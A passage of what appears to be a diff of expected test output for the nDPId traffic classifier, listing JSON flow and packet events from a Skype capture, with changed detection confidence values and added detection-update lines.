{"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1573,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970690190,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1574,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690191,"flow_last_seen":1431970690191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690191,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1431970690191,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690191,"pkt":"0NQSxnP1PBXCt3IOCABFAABA15NAAEAGZ+bAqAEiF84hpshfAbtO4sWoAAAAALAC\/\/\/AXwAAAgQFtAEDAwUBAQgKPjJehwAAAAAEAgAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1577,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1431970690235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970690235,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7yF8ZBQnnTuLFqaASOJBGLgAAAgQFrAQCCArsPkNyPjJehwEDAwU="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1578,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1431970690235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970690235,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z6tAAEAGb9rAqAEiF84hpshfAbtO4sWpGQUJ6IAQECydKQAAAQEICj4yXrLsPkNy"} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1579,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970690191,"flow_last_seen":1431970690235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431970690235,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1579,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970690191,"flow_last_seen":1431970690235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431970690235,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1611,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690890,"flow_last_seen":1431970690890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690890,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1611,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1431970690890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690890,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtBpAAEAGkJfAqAEiW77YfchgMD4BM37JAAAAALAC\/\/8o9wAAAgQFtAEDAwUBAQgKPjJhMgAAAAAEAgAA"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1612,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690890,"flow_last_seen":1431970690890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690890,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -910,7 +910,8 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1849,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1431970697522,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970697522,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05GtAAEAG33HAqAEilQ0gD8hrNFBkkG+a8NlOGoAQECxFMgAAAQEICj4yeso\/iaIX"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1850,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970697522,"flow_last_seen":1431970697522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970697522,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1850,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1431970697522,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697522,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJ8VAAEAGrFLAqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9fxAAAAgQFtAEDAwUBAQgKPjJ6ygAAAAAEAgAA"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1858,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970697478,"flow_last_seen":1431970697568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1431970697568,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1858,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970697478,"flow_last_seen":1431970697568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1431970697568,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1869,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970697478,"flow_last_seen":1431970697921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7129,"flow_avg_l4_payload_len":356,"midstream":0,"thread_ts_msec":1431970697921,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1870,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1431970697921,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697921,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXadAAEAGdnDAqAEiUHlUXchq861iaxDLAAAAALAC\/\/\/mhAAAAgQFtAEDAwUBAQgKPjJ8VgAAAAAEAgAA"} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1431970698527,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970698527,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIalAAEAGsm7AqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9b2wAAAgQFtAEDAwUBAQgKPjJ+swAAAAAEAgAA"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970698661,"flow_last_seen":1431970698661,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970698661,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -926,7 +927,8 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1917,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1431970700273,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970700273,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXG9AAEAGZ2LAqAEilQ0gD8hwNFCdm737AAAAALAC\/\/+kFAAAAgQFtAEDAwUBAQgKPjKFdwAAAAAEAgAA"} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1920,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":1431970700316,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970700316,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHC8tiDYnZu9\/KASOJDXAgAAAgQFrAQCCAo\/i4hfPjKFdwEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":3,"flow_last_seen":1431970700316,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970700316,"pkt":"0NQSxnP1PBXCt3IOCABFAAA08VdAAEAG0oXAqAEilQ0gD8hwNFCdm738vLYg2YAQECwuAwAAAQEICj4yhaE\/i4hf"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1929,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970700273,"flow_last_seen":1431970700360,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1431970700360,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1929,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970700273,"flow_last_seen":1431970700360,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1431970700360,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1939,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970700273,"flow_last_seen":1431970700419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5338,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":1431970700419,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970701461,"flow_last_seen":1431970701461,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970701461,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1431970701461,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970701461,"pkt":"0NQSxnP1PBXCt3IOCABFAABABNpAAEAGl07AqAEi1KEIJMhxNFBceQzyAAAAALAC\/\/9qAAAAAgQFtAEDAwUBAQgKPjKKDQAAAAAEAgAA"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1958,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970701508,"flow_last_seen":1431970701508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970701508,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -939,7 +941,8 @@ 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1431970703073,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970703073,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2zBAAEAGwPfAqAEi1KEIJMhzNFD26tn9AAAAALAC\/\/\/8RgAAAgQFtAEDAwUBAQgKPjKQRwAAAAAEAgAA"} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2017,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1431970703145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970703145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHPVGwsc9urZ\/qASOJBaugAAAgQFrAQCCAo\/nFogPjKQRwEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2018,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1431970703145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970703145,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QUdAAEAGWu3AqAEi1KEIJMhzNFD26tn+1RsLHYAQECyxnAAAAQEICj4ykI8\/nFog"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2032,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970703073,"flow_last_seen":1431970703221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1519,"flow_avg_l4_payload_len":151,"midstream":0,"thread_ts_msec":1431970703221,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2032,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970703073,"flow_last_seen":1431970703221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1519,"flow_avg_l4_payload_len":151,"midstream":0,"thread_ts_msec":1431970703221,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2051,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970703073,"flow_last_seen":1431970703668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6438,"flow_avg_l4_payload_len":321,"midstream":0,"thread_ts_msec":1431970703668,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970704329,"flow_last_seen":1431970704329,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970704329,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1431970704329,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970704329,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHThAAEAGppnAqAEilQ0gD8h0NFB7qA8CAAAAALAC\/\/9lUQAAAgQFtAEDAwUBAQgKPjKVIwAAAAAEAgAA"} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":2,"flow_last_seen":1431970704371,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970704371,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHQNAtU7e6gPA6ASOJA1ewAAAgQFrAQCCAo\/gOZ\/PjKVIwEDAwk="} @@ -948,17 +951,17 @@ 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1431970705942,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970705942,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIgJAAEAGoc\/AqAEilQ0gD8h1NFDRK91BAAAAALAC\/\/87SwAAAgQFtAEDAwUBAQgKPjKbZQAAAAAEAgAA"} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2082,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":2,"flow_last_seen":1431970705984,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970705984,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHXO868x0SvdQqASOJBt+QAAAgQFrAQCCAo\/gOgTPjKbZQEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":1431970705984,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970705984,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0iDxAAEAGO6HAqAEilQ0gD8h1NFDRK91CzvOvMoAQECzE+QAAAQEICj4ym48\/gOgT"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2091,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970705942,"flow_last_seen":1431970706029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1431970706029,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2091,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970705942,"flow_last_seen":1431970706029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1431970706029,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 